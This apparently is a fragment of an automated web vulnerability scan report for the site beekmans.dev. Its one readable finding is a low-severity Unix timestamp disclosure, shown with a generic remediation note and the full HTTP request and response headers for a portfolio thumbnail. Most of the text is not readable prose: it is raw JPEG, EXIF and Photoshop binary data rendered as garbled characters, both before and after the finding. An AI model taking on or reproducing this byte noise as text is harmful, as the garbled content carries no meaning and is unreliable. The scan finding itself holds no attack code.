¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺+_%þ2mÎúÀšºoµÂv&•Ó¸Ìeb«uH¸Lÿ‰ZœTÎOŽ@ZI¼a”ɇ›6õ6×.“V´cܾŸÒ_CüŸ‘E1Œú¯T)¼vŽã؛)µ7f*§žÃÎi«è*”FýQˈZšZ˜˜IѳG,l©ܝðÝB“Àá¢aPGú°}G—FŠÁ€e8éÿñ_n7N'¨R~×ÿŠû¡êëǨr~×÷N®¼z„ÿñééÕרOôÿoî§«Ž¨/ô÷CÕǟPäú7ûøuêã‡Päüÿ­î‡çÕÇ¡?оþžéӃêýúþëÕ¼ú‡'çý÷çÝNP¤üÿ­ÿÿPä÷SçÕ¼ú‡'çý÷çÛgˆêþcìêŸSþ·üGºúuqǨOõÿ}ý}Ѿ®<ú„ÿñ_t>}\q=B“óþ¹ÿ‰÷SÕǟP¤üÿ¾þžêxŽ®¼:†ÿñÛôêãêô¿—§ó	ü¡~@çB X1=yÙyz›¶˜hv¦ñ®¨ki¶˜èr27˜g?¦Od[†ßÆ{uûGùGùGA]çe®»Ë4ù²ð¯ùGæ:¾d]º÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^èlë/ø³×ÚÉ¿÷›Ùíý¼é?Êz9Û²“ý7ùBG²®Œz÷¿uî½ïÝ{¤Îñÿg-ÿ,#ÿ܈}«±ÿràûÉÒkÏ÷_³ü£¢ãìSÐ{¯{÷^ëÞý׺÷¿uî¿ÿÓÙ_ÞDtëÞý׺÷¿uî½ïÝ{¡W«ÿÏæ?å•ýSì›wø`ûOù:4Û>)¾Áþ^…ÿduï~ëÝ{ߺ÷P2¿ñkÉÔgþãÉíȵ‹ý0ÿMÍý”¿éOø:+^Æz÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî‹?ɍ[_¿¶í¤ðawÞ"šUÛ;¤DI^^Q‡ÌˆÁ’³	S3k4”ÎÆH¾²G)ÆÑ¼MµËе³åÿ(ô?áà|ˆzŒGú'T¾ö6èëÏ“ÙûÇQ‡Îâf1TÒÎ.’ÆMଣoe\~¸fŒ”‘
          Á÷'As
          Ü	qná¢aÇü‡Ð1Ñ´l®5)Áé'çýø¯·ON¯¡Éùÿ_Ý:ºñêÿÄ{§§W^¡?Óý¿ºž®8 ¿ÓÝW}C“èßì?â=׫ŽC“óþ·º?ŸW:„ÿAþûú{§N¨/ôëû¯Vó꟟÷ߟt=9ü=B“óþ·üGº¯ü=C“ÝOŸVó꟟÷ߟmž#«ù³¨R}OúßñëéÕÇ¡?×ý÷õ÷Føz¸óêÿÅ}ÐùõqÄõ
          OÏúçþ'ÝOW}B“óþûú{©â:ºðêÿÄ{oӫލ/ôï¿§½uqÀõy?ËÇù8N…ùžÿqŸä؎ºì¬´üã¹Zz©¼k¦oø·~˜è²2Ÿò~"¼Z$ˆŠþº¦sæ?Ê?ÍÐWyÙ5¼³Nî,£Ïæ>~£öu~ÿ^G ý²>ýwïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^èlë/ø³×ÚÉ¿÷›Ùíý¼é?Êz9Û²“ý7ùBG²®Œz÷¿uî½ïÝ{¤Îñÿg-ÿ,#ÿ܈}«±ÿràûÉÒkÏ÷_³ü£¢ãìSÐ{¯{÷^ëÞý׺÷¿uî¿ÿÔÙ_ÞDtëÞý׺÷¿uî½ïÝ{¡W«ÿÏæ?å•ýSì›wø`ûOù:4Û>)¾Áþ^…ÿduï~ëÝ{ߺ÷P2¿ñkÉÔgþãÉíȵ‹ý0ÿMÍý”¿éOø:+^Æz÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¢éò+ã–Òù¶
          @EˆÞ¨e;[vEzš	[SÿÈÓ%vªSû“xØù#*÷ÔkµnÓí“jNèâ__˜ô#×ò==ÍT|>c­|»¯7oVÌÞ¸©qY¼d¾¤k½-u$…þÛ'Œª
          #­ÆÖ"–ŽUúØ«ueY:ÚêÈâÝõFGì>`úéÑÌN²ÊqÐ{'çýnôêñêÿÄ{§§W^¡?Óý¿ºž®8 ¿ÓÝW}C“èßì?â=׫ŽC“óþ·º?ŸW:„ÿAþûú{§N¨/ôëû¯Vó꟟÷ߟt=9ü=B“óþ·üGº¯ü=C“ÝOŸVó꟟÷ߟmž#«ù³¨R}OúßñëéÕÇ¡?×ý÷õ÷Føz¸óêÿÅ}ÐùõqÄõ
          OÏúçþ'ÝOW}B“óþûú{©â:ºðêÿÄ{oӫލ/ôï¿§½uqÀõO¡ÿ_ÛgÏ«Ž]ïòîþc§n6¡>AgYöó56'¯;'-Qs·®
          -­»ë§k¶úc¢¯“CqÇí´=1-õ†­S@½Þc׿>/?·ˆWzØü@זIßŔyü×çê<ü³Ç`ðCÊAR‚ ‚8 d:ïߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷CgYŞ»þÖMÿ¸´ÞÈ7oíãÿIþSÑÎÛý”Ÿé¿È:=•tc×½û¯uï~ëÝ&wü{9oùaþäCí]û—ÛþN“^¸ÒýŸåbžƒÝ{ߺ÷^÷î½×½û¯uÿÕÙ_ÞDtëÞý׺÷¿uî½ïÝ{¡W«ÿÏæ?å•ýSì›wø`ûOù:4Û>)¾Áþ^…ÿduï~ëÝ{ߺ÷P2¿ñkÉÔgþãÉíȵ‹ý0ÿMÍý”¿éOø:+^Æz÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^è•üÑÄ|{ÎlÜv7¹weÉÜSšÃ°÷$8¼¦k;¬êIÅà¨rÍ»3*%ZH‰bº]&ñ°?ØsŽw{L‘
          kZ€ûI7§ŸÊ•éU©˜91-W̫ϪÉSÃI[[KO]M“§§©š2TI[%|QHÉe,yJ„pT(‚x!”)‘ZàI
          K*’¤äiQòÁ#öÑÒùc¦‡ÿˆ÷_N®½B§ûu=\p=A§º®<ú‡'Ñ¿ØÄ{¯W:‡'çýot<>®8u	þƒý÷ô÷NœP_è?×÷^­çÔ9??ï¿>èzsøz…'çýoøt=_øz‡'ºŸ>­çÔ9??ï¿>Û<GWógP¤úŸõ¿â=×Ó«Ž=B¯ûïëîðõqçÔ'ÿŠû¡óêã‰êŸŸõÏüOºž®<ú…'çý÷ô÷SÄuuáÔ7ÿˆöß§WP_è?ßOzêãêŸCþ¿¶ÏŸW:…/çý‡üGºõqÀu³wòÊÝ_.évÙÚ½ÃÖü—Mä0ß{Ö£•ÜRŸ;ÄDö8LÞÛÉn(7–CjÖCþR´/4´j¢J'ŠJ`öà¶ÅÙ¢xµÈ¡ÏçJW×üü@{ô{ašI-nº½4'Ô4×ÔWùÖ¶Ùì· ß^÷î½×½û¯uï~ëÝ{ߺ÷CgYŞ»þÖMÿ¸´ÞÈ7oíãÿIþSÑÎÛý”Ÿé¿È:=•tc×½û¯uï~ëÝ&wü{9oùaþäCí]û—ÛþN“^¸ÒýŸåbžƒÝ{ߺ÷^÷î½×½û¯uÿÙ
          Evidence
          178977234
          Solution

          Manually confirm that the timestamp data is not sensitive, and that the data cannot be aggregated to disclose exploitable patterns.

        38. GET https://beekmans.dev/img/portfolio/minor/blue/39-thumbnail.jpg
          Alert tags
          Alert description

          A timestamp was disclosed by the application/web server - Unix

          Other info

          182272822, which evaluates to: 1975-10-11 16:20:22

          Request
          Request line and header section (266 bytes)
          GET https://beekmans.dev/img/portfolio/minor/blue/39-thumbnail.jpg HTTP/1.1
          Host: beekmans.dev
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: https://beekmans.dev/
          
          
          Request body (0 bytes)
          Response
          Status line and header section (1162 bytes)
          HTTP/1.1 200 OK
          Date: Mon, 06 Dec 2021 09:56:07 GMT
          Content-Type: image/jpeg
          Content-Length: 206479
          Connection: keep-alive
          last-modified: Tue, 02 Nov 2021 10:18:04 GMT
          etag: "3268f-5cfcb9bec2340"
          content-security-policy: default-src 'self' http: https: data: blob: 'unsafe-inline'
          x-frame-options: SAMEORIGIN
          x-xss-protection: 1; mode=block
          x-content-type-options: nosniff
          referrer-policy: no-referrer-when-downgrade
          strict-transport-security: max-age=31536000; includeSubDomains; preload
          Cache-Control: max-age=14400
          CF-Cache-Status: HIT
          Age: 2419
          Accept-Ranges: bytes
          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SYXxHO2kzCBxL9qJ96pBwK%2Fu7dVLWBMYkUBmyhg22h%2FJCxoI7u0Yf9ccFyIITYmPwk%2BYbhFBi8dkM8jrfr7jbM2TCDCUS4Fm46vKeCPMJFbFffN2RsHn4GLPwNUiVLI%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 6b94a47d1d0f4c43-AMS
          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
          
          
          Response body (206479 bytes)
          ÿØÿáæExifMM*bj(1!r2“‡i¨Ô
          ü€'
          ü€'Adobe Photoshop 21.0 (Macintosh)2019:12:03 13:35:22  ° v"*(2¬HHÿØÿíAdobe_CMÿîAdobed€ÿۄ			
          
          
          
          ÿÀT "ÿÝ
          ÿÄ?	
          	
          3!1AQa"q2‘¡±B#$RÁb34r‚ÑC%’Sðáñcs5¢²ƒ&D“TdE£t6ÒUâeò³„ÃÓuãóF'”¤…´•ÄÔäô¥µÅÕåõVfv†–¦¶ÆÖæö7GWgw‡—§·Ç×ç÷5!1AQaq"2‘¡±B#ÁRÑð3$bár‚’CScs4ñ%¢²ƒ&5ÂÒD“T£dEU6teâò³„ÃÓuãóF”¤…´•ÄÔäô¥µÅÕåõVfv†–¦¶ÆÖæö'7GWgw‡—§·ÇÿÚ?ì’I%iI$’JrúŸ«n}8Âëi¯Ðu¤T털?gº?’šž•‘yp«/$í‚fèç⥛ÿ,Sÿ…_ÿŸÏÕвtÃ"ë‰ò—,tµ 9°sî^GþÄ%û7þåäìBëX^kcŸK[a½€‚{´>¿üÕ0ZI`ZÞ%Ø.áxÿØ9¿÷/#ÿbýƒ›ÿrò?ö!uö0°L×5Ó‰§Ç䏿.ÁTGöoýËÈÿ؄¿`æÿܼýˆ]U
          º–Ü(umx¶´±ãX÷±Íö©úŒýÆÿ¯ÉžDXF4H:£É~ÁÍÿ¹yû—ìßû—‘ÿ±­W݀| ¤û+{«¬>À	c
          Æ=­Ý®ÝÈûòì¡y'ô,Úë6»+#cD’/¨ö]‹f=µåd<›ë¬¶ËšZ÷mxsWaœp^ç1µ8Ña¶½aöïÌzä³~Ž7þ£þ©IŠfbÊ$+GdòRNy?É«T’I$§ÿÐì’I%iI!Úm5F°‰EF”åæÿË4áGÿçÅ·õséäü+ÿы7þZ£ÿ
          ?ÿ>-¿«ŸO'á_þŒK'óGËþét]+…€ã½Ûš,ö€ÂG¨æí­ÞýŸAX-
          lëÒ~à?+”ÏÑUNëïJ¤9ùx¸8wçe¸2ŒjÝe"a­ŒÎwòW5‹ÒúÏÖJۛÖrïé˜Wø½#â—úF6ÙÔ2X=k-µ§ßŽÏM”Æo­\úðÖ¿¢×]ÀK3pٙ<z'"ŸSwò~Š?ւöt÷ÙìnÐ,’-ÎÖÔG溯ç=ßÍïHςC}æ¯ÃÝÉw\DFüܱõB†ÐÜÏ«_+
          çɤ›Ý‘c„ûo£ Ûê}Å«¿W:æOR¯#¨TÜ^¯Ó^)ÏÇÛ.©É ïÕòYï¯ÿ8U>©>ÛZßMþ™ihy2ƺ}cŽÝvîý«ÿ[S›ÆE» 5ݮɎÆFÚ7ÿÂzôÐä2Þ®ü—óx§6çºØ™nélîm‘ê}ý-ŸAŽhåÄ ýõ8Ø9ºx€¤+Q·üЎŒ:‰âFßú’¸Üÿ†èÿª]P…pÿ·ËóJã³þŽ/þ£þ©OËì|֗mßHüS'wÒ?È­RI$’ŸÿÑì“=í­…ï0Öò,‹t˜…Óà[î
          Øci}LÛ{†³ ’´+œõ|ÿ¯úÿ)ktÜÇd×aÜúÀ!ÝËNžïå5>CKì’×Îÿ–èÿÂoÿÏ«sêçÓÉøWÿ£wü»Gþþ}sêçÓÉøWÿ£26—é&.Ó€÷s÷ÿ§:Èø F€m:y»ÿ ›ª=KßÒÛüå§W¸çV׿k]ú/Sm¸ª¼U>Ku>‹Õz~GNËnì|¦ì$ùìß¤c½õÿ-sÔõûº[‰õ²—Î;MUuºêu´_Y®¿Òm¶ádÙ·õŠmýì¯Õõ=%ÓÛ[žA¢ƒk¸
          Ói3ü©nÔAGPz<áúéõyímÝ_1¦hÆÄ¥Ík\á·}™6VÌ|Zýߥ¹f}Të732η–1¾±u,“^]V±Ím~—è±1i¾¦ÐÖ;ôvYoé¿áoéXAÀxÂóß®¿UZδί•i+>Æ3¨>dÒí­¡ŽÜáíÆÈÙU~£¿£?þù¹!íэUïKOÑQâ‘lø¾‰é¿÷ÿ脃,ã~ŸÌcfæt½˜¶d9øºWuÐç4ðÜ\› 9Û¿í6K¿þbïÓú_iÔ¯ªÚàXâÚ÷ˆmÀn
          ${^æîc®«{Ñïå£?Ýro¡ï®ÍÎ¥ýïø›?ê
          ã:‡ÑÅÿÃxÿõK±ÍméÏm¯XÚð6‡83Üýží›¿uqÝGèâÿáÌúµs—ùK^[÷wôÅ2w}#ñLŠÅ$’I)ÿÒì–?_Ê{V00ÂßQÿÊ2ZÉþ¦Õ°‘õ_©2‹ï¶æXþ´w¾=ÌÑVøã–ñ>´ຜ,JñhkY«Þ¬yåÆ?ê>Äcõ¤G¯“¯òÙÿ¤U̼
          °é«ÓsœWï‚`7Ghû‰±•Jˆ/)×óNUǹ¬Šæm'o62¿uë~n)qÇ¥µ—Àw¾f>Ó­ß¼¶:—FÄêO®ËÝeo¨‡VF­'v×5íç*óG§§ÈûëÿÒiÀƨ¨?óó«þë~öÿé¿ççWýÖýíÿÒ(ßóG§§ÈûëÿÒi͝þŸ#ï¯ÿI¡Xÿt}е±~ºu¬¬š±«ô˜ûœ×Úö±€Ÿß£þ¿AhUÕþ´Ú^öx©‚Ë
          Žu[k/¾ƒmŒ¿»+mc¹ïÞÏ ³ßõo«2èȼ]]–׸Tæîc὏©Ì{W+gÖ.³‘éÙ~Kí,pµ¡çsCçÔÝé;ôOÚÿ¡]Œô«ÿè#ö.ˆ'gµ¯ë[¶·ß^Nñ«©¹½{š*{-½¯sY„ë[¶¬w¹õ½›þ‚¥Ô¾²uæ?¦õ*j»Óp¦á2Ͷ†oöºš··Ò·ü+5oÖ~¹uÇ·$¾‹ÚúËZmÍµžÖlÛcö3üøMkôLýa§'¨uí9>¿¦ç3`Üuß¹Ž÷~gµ¯%Þ¨z»:Xo¯ãÑ/ý>€×ŠçûFßQÝ7%ßKs)ý&þsôÎÓúM:)ôim;Ý`d€çêâ&FãùÛygãýZÅÆvê2²Ii#ôdÓ½š:¯Írӓ0t?ø*ÆBñ¼¿­ûÒýÞ&ÿ-ž9	,ºGú¿Õýî—Zë]S†vƒÒtINÇ;eŒüýËõ‡æß‹A¥µ´ÐýÁÅßEãH-oï.žú*È¢Ê.nêíik‡‘ÿ¿5gc}Wéô]MæËžêËmkæAƒì±ÁŒký?Q¿ÛVyLàÀé(ÿ΋[›ÃÁ.1òÈÿ‹'eßHüS$’™¨¤’I%?ÿÓìÚǼ–±¥ç˜h’¶±­
          Ç­®kÚÐ,w Gî¬þ–æ·%ÅÄ4l:;µiœ¬``ÚÀG#pþõ.Cf©l{¯ë3Áßæ;ÿ"©õ-×VÆÔǸ‡I†;ˆ#¸óVþ׋þš¿ó‡÷¥ö¼_ôÕÿœ?½0X7E%Åû6OúÿšRû6OúÿšV×ÚñÓWþpþô¾×‹þš¿ó‡÷©=É~ê8GwìÙ?è_þiU:…ù˜~˜¯§ef$ŸEš4ún#ó§Úº_µâÿ¦¯üáýé}¯ý5çïKܗwx¼Ž£ÔîǺ‘Ðóšm­õ‡Èíu{¾æî\“~«õÐÐ>œ æ^½‡íx¿é«ÿ8z_kÅÿM_ùÃûÒ÷Oî~k­‹ãÿóc®ÿÜŸûeëwêû:·GÄ·Α™y¶ßT9Œ-le{aàþâô?µâÿ¦¯üáýé}¯ý5çïKÝ?¹ù¨›KËàåæåÞi³¥åâ
          ¥ÂË[,$~d€6»÷U㍐D^GõJÚû^/újÿÎޗÚñÓWþpþôŽCû«hwy~£™WK¯~Cíx>†3´ÞáùÖÍÇ®}ÿ¿üÚäÝÔ³Æyê>±v[¹ä{\ßô.¯þãÿÁèÏzØúó‹”þ¤ÌÚ/g°VÝ퇁³vìg£õ7zµþÿé?bŸ(F<Qˆ7ýêùdœèJF\:{N“Ô+êÔ1Ø}Zà_@÷9„ýëÔý¿¢³þþ¯}›'ýÿÍ+Îñs²ú~[30¬ô²+àò×4ý*­gøJŸùìÿўõé]ë>YÄ6nn>MP21Þá,'óÚã·Ô¡ÿàíÿÑ¿£LÉÅ@°³„!û6OúÿšT_]Œ€ö9“Æá·V10.dŸåïYýYíu•mpt5ÜîÔÈ̓DRÑÿÔî1¿œ?Õþ!BïçŸñþçT•ŸÒYÑúD´_<$œ‡è}Ñ|ð’J~‡Ñ-Ï	$§è}Ñ|ð’J~‡Ñ-Ï	$§è}Ñ|ð’J~„¿Ðô,ûNß³í>¶ÿ£·ù_ëýEÃdú>«þÏ¿ÐÜ}/SéíüÝð¼Ñ%&>©‹èRéß´hÓû.~Û'ÓýÝ¿á}yöý›oóûÿó禼õ$e³#ôES¾½ÛwKwm³ùÛ7{¶nú‘²þ“>ò¯œRPu}ÿÙÿí.Photoshop 3.08BIMïZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%G+R8BIM%jäÞ캐Lµj`,ë–E¯8BIM:åprintOutputPstSboolInteenumInteClrmprintSixteenBitboolprinterNameTEXTprintProofSetupObjcProof Setup
          proofSetupBltnenumbuiltinProof	proofCMYK8BIM;-printOutputOptionsCptnboolClbrboolRgsMboolCrnCboolCntCboolLblsboolNgtvboolEmlDboolIntrboolBckgObjcRGBCRd  doub@oàGrn doub@oàBl  doub@oàBrdTUntF#RltBld UntF#RltRsltUntF#Pxl@R
          vectorDataboolPgPsenumPgPsPgPCLeftUntF#RltTop UntF#RltScl UntF#Prc@YcropWhenPrintingboolcropRectBottomlongcropRectLeftlong
          cropRectRightlongcropRectToplong8BIMíHH8BIM&?€8BIMò
          ÿÿÿÿÿÿ8BIM
          8BIM8BIMó	8BIM'
          8BIMõH/fflff/ff¡™š2Z5-8BIMøpÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿèÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿèÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿèÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿè8BIM8BIM
          8BIM08BIM-)í8BIM@@8BIM8BIM}v°$19-top_5_vulnerability_scanners copy°vnullboundsObjcRct1Top longLeftlongBtomlongvRghtlong°slicesVlLsObjcslicesliceIDlonggroupIDlongoriginenumESliceOrigin
          autoGeneratedTypeenum
          ESliceTypeImg boundsObjcRct1Top longLeftlongBtomlongvRghtlong°urlTEXTnullTEXTMsgeTEXTaltTagTEXTcellTextIsHTMLboolcellTextTEXT	horzAlignenumESliceHorzAligndefault	vertAlignenumESliceVertAligndefaultbgColorTypeenumESliceBGColorTypeNone	topOutsetlong
          leftOutsetlongbottomOutsetlongrightOutsetlong8BIM(?ð8BIM)î8BIMÈ Tà€¬ÿØÿíAdobe_CMÿîAdobed€ÿۄ			
          
          
          
          ÿÀT "ÿÝ
          ÿÄ?	
          	
          3!1AQa"q2‘¡±B#$RÁb34r‚ÑC%’Sðáñcs5¢²ƒ&D“TdE£t6ÒUâeò³„ÃÓuãóF'”¤…´•ÄÔäô¥µÅÕåõVfv†–¦¶ÆÖæö7GWgw‡—§·Ç×ç÷5!1AQaq"2‘¡±B#ÁRÑð3$bár‚’CScs4ñ%¢²ƒ&5ÂÒD“T£dEU6teâò³„ÃÓuãóF”¤…´•ÄÔäô¥µÅÕåõVfv†–¦¶ÆÖæö'7GWgw‡—§·ÇÿÚ?ì’I%iI$’JrúŸ«n}8Âëi¯Ðu¤T털?gº?’šž•‘yp«/$í‚fèç⥛ÿ,Sÿ…_ÿŸÏÕвtÃ"ë‰ò—,tµ 9°sî^GþÄ%û7þåäìBëX^kcŸK[a½€‚{´>¿üÕ0ZI`ZÞ%Ø.áxÿØ9¿÷/#ÿbýƒ›ÿrò?ö!uö0°L×5Ó‰§Ç䏿.ÁTGöoýËÈÿ؄¿`æÿܼýˆ]U
          º–Ü(umx¶´±ãX÷±Íö©úŒýÆÿ¯ÉžDXF4H:£É~ÁÍÿ¹yû—ìßû—‘ÿ±­W݀| ¤û+{«¬>À	c
          Æ=­Ý®ÝÈûòì¡y'ô,Úë6»+#cD’/¨ö]‹f=µåd<›ë¬¶ËšZ÷mxsWaœp^ç1µ8Ña¶½aöïÌzä³~Ž7þ£þ©IŠfbÊ$+GdòRNy?É«T’I$§ÿÐì’I%iI!Úm5F°‰EF”åæÿË4áGÿçÅ·õséäü+ÿы7þZ£ÿ
          ?ÿ>-¿«ŸO'á_þŒK'óGËþét]+…€ã½Ûš,ö€ÂG¨æí­ÞýŸAX-
          lëÒ~à?+”ÏÑUNëïJ¤9ùx¸8wçe¸2ŒjÝe"a­ŒÎwòW5‹ÒúÏÖJۛÖrïé˜Wø½#â—úF6ÙÔ2X=k-µ§ßŽÏM”Æo­\úðÖ¿¢×]ÀK3pٙ<z'"ŸSwò~Š?ւöt÷ÙìnÐ,’-ÎÖÔG溯ç=ßÍïHςC}æ¯ÃÝÉw\DFüܱõB†ÐÜÏ«_+
          çɤ›Ý‘c„ûo£ Ûê}Å«¿W:æOR¯#¨TÜ^¯Ó^)ÏÇÛ.©É ïÕòYï¯ÿ8U>©>ÛZßMþ™ihy2ƺ}cŽÝvîý«ÿ[S›ÆE» 5ݮɎÆFÚ7ÿÂzôÐä2Þ®ü—óx§6çºØ™nélîm‘ê}ý-ŸAŽhåÄ ýõ8Ø9ºx€¤+Q·üЎŒ:‰âFßú’¸Üÿ†èÿª]P…pÿ·ËóJã³þŽ/þ£þ©OËì|֗mßHüS'wÒ?È­RI$’ŸÿÑì“=í­…ï0Öò,‹t˜…Óà[î
          Øci}LÛ{†³ ’´+œõ|ÿ¯úÿ)ktÜÇd×aÜúÀ!ÝËNžïå5>CKì’×Îÿ–èÿÂoÿÏ«sêçÓÉøWÿ£wü»Gþþ}sêçÓÉøWÿ£26—é&.Ó€÷s÷ÿ§:Èø F€m:y»ÿ ›ª=KßÒÛüå§W¸çV׿k]ú/Sm¸ª¼U>Ku>‹Õz~GNËnì|¦ì$ùìß¤c½õÿ-sÔõûº[‰õ²—Î;MUuºêu´_Y®¿Òm¶ádÙ·õŠmýì¯Õõ=%ÓÛ[žA¢ƒk¸
          Ói3ü©nÔAGPz<áúéõyímÝ_1¦hÆÄ¥Ík\á·}™6VÌ|Zýߥ¹f}Të732η–1¾±u,“^]V±Ím~—è±1i¾¦ÐÖ;ôvYoé¿áoéXAÀxÂóß®¿UZδί•i+>Æ3¨>dÒí­¡ŽÜáíÆÈÙU~£¿£?þù¹!íэUïKOÑQâ‘lø¾‰é¿÷ÿ脃,ã~ŸÌcfæt½˜¶d9øºWuÐç4ðÜ\› 9Û¿í6K¿þbïÓú_iÔ¯ªÚàXâÚ÷ˆmÀn
          ${^æîc®«{Ñïå£?Ýro¡ï®ÍÎ¥ýïø›?ê
          ã:‡ÑÅÿÃxÿõK±ÍméÏm¯XÚð6‡83Üýží›¿uqÝGèâÿáÌúµs—ùK^[÷wôÅ2w}#ñLŠÅ$’I)ÿÒì–?_Ê{V00ÂßQÿÊ2ZÉþ¦Õ°‘õ_©2‹ï¶æXþ´w¾=ÌÑVøã–ñ>´ຜ,JñhkY«Þ¬yåÆ?ê>Äcõ¤G¯“¯òÙÿ¤U̼
